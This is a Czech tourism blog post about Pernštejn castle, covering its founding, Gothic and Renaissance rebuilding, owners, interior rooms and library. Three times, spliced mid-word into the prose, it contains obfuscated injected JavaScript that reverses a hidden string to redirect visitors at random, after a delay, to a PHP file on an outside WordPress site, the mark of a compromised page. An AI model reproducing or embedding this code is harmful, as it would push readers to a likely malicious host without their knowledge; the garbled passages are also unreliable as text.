Rainbow page separator

HRAD PERNŠTEJN

Úterý, 8. září 2009

Pohádkový goticko-renezanční hrad, reprezentační sídlo rodu Pernštějnů, v 16. s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toletí nejbohatšího a nejmocnějšícho rodu Českého království.hrad-pernstejnHrad jako z pohádky, který nikdy nedobyli válečníci, byl založen ve 2. pol. 13. st. Po požáru v r. 1457 byl velkoryse pozdněgoticky přestavěn, v 16. s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toletí doplněn o renezanční palác. Nádherný hrad patřil od svého založení, první písemná zpráva je z roku 1285, až do roku 1596 už vzpomenutému rodu Pernštejnů.

Největší pozornosti návštěvníků se těší vstupní síň s barevnou vitráží, která se sice hlásí do r. 1518, ve skutečnosti však jde o romantický výtvor z 19.st., dále rytířský sál se štukovou výzdobou, hradní obrazárna, lovecký sál, „sál spiklenců“, hradní kaple s iluzivní malířskou výzdobou a hladomorna.

Od r. 1818 se posledními majiteli stávají Mitrovští, jimž hrad patřil až do r. 1945. Ti věnovali velkou pozornost hradní knihovně, která dnes obsahuje 6 567 knižních titulů o 15 308 svazcích.hrad-pernstejn1

 

Ráj turistů i filmařů! Pro milovníky his[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torie má připraveno několik prohlídkových tras a řadu překvapení. Pernštejnský tis se stal Stromem roku 2005.

otevírací doba

 

 

 

  

www.info.bystricenp.cz